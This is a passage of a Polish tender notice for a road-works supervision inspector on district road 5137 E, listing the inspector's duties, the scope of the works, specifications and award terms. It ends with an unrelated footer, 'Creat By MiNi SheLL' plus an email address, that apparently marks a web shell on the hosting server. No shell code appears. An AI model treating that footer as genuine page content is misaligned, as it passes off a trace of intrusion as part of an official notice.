f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
4)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
2.Na wykonanie usługi w sposób odbiegający od dokumentacji technicznej lub podejmowanie innych działań przez wykonawcę robót, wpływających na wzrost wartości usługi potrzebna jest pisemna zgoda Zamawiającego.
3.Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
4.Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
5.Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Remont drogi powiatowej Nr 5137 E relacji Ozorków - Parzęczew - granica powiatu Łążki..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu remontu na drodze powiatowej Nr 5137 E  relacji Ozorków - Parzęczew - granica powiatu Łążki, CPV. 45.23.32.20-7.
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu remontu na drodze powiatowej Nr 5137 E  relacji Ozorków - Parzęczew - granica powiatu Łążki, 
1.Realizacja przedmiotu zamówienia obejmuje:
1)mechaniczne oczyszczenie i skropienie emulsją asfaltową istniejącej nawierzchni bitumicznej, na powierzchni 3300,00 m2,
2)wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną asfaltową mechanicznie w ilości 50 kg/m2,
3)wykonanie nawierzchni z mieszanek mineralno - bitumicznych asfaltowych 
o grubości 3 cm, na powierzchni 3300 m2,
4)obustronne plantowanie terenu szer. 1,0 m, na powierzchni 1200 m2.
2.Wymagania szczegółowe dotyczące wykonania i odbioru robót objętych przedmiotem zamówienia zawarte są w: 
1)Ogólnych Specyfikacjach Technicznych (OST) D -00.00.00. Wymagania ogólne, które stanowią załącznik Nr 8 do SIWZ,
2)Ogólnych Specyfikacjach Technicznych (OST) D 04.08.00 Wyrównanie podbudowy, które stanowią załącznik Nr 9 do SIWZ,
3)Ogólnych Specyfikacjach Technicznych (OST) D 05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr  10 do SIWZ,
4)Ogólnych Specyfikacjach Technicznych (OST) D -04.03.01. Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 11 do SIWZ,
5)Szczegółowych Specyfikacjach Technicznych (SST) D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 12 do SIWZ,
6)Szczegółowych Specyfika cjach Technicznych (SST) D-04.08.01 Wyrównanie podbudowy mieszankami mineralno - asfaltowymi, które stanowią załącznik Nr 13 do SIWZ.
7)Szczegółowych Specyfikacjach Technicznych (SST) D-05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr 14 do SIWZ.
3.Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi.
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
Zakres podstawowych obowiązków i praw inspektora nadzoru wynika 
z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. Z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
1)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową 
i pozwoleniem budowlanym, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
2)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów 
3)urządzeń, zgłaszanych przez wykonawcę robót, szczególnie 
w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
4)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a w szczególności zapobieganie zastosowaniu wyrobów i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
5)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
6)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział 
w czynnościach odbioru robót,
7)potwierdzanie ilości wykonanych robót,
8)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
9)sprawdzanie rozliczeń Wykonawcy robót budowlanych 
i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
10)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
11)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy  z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com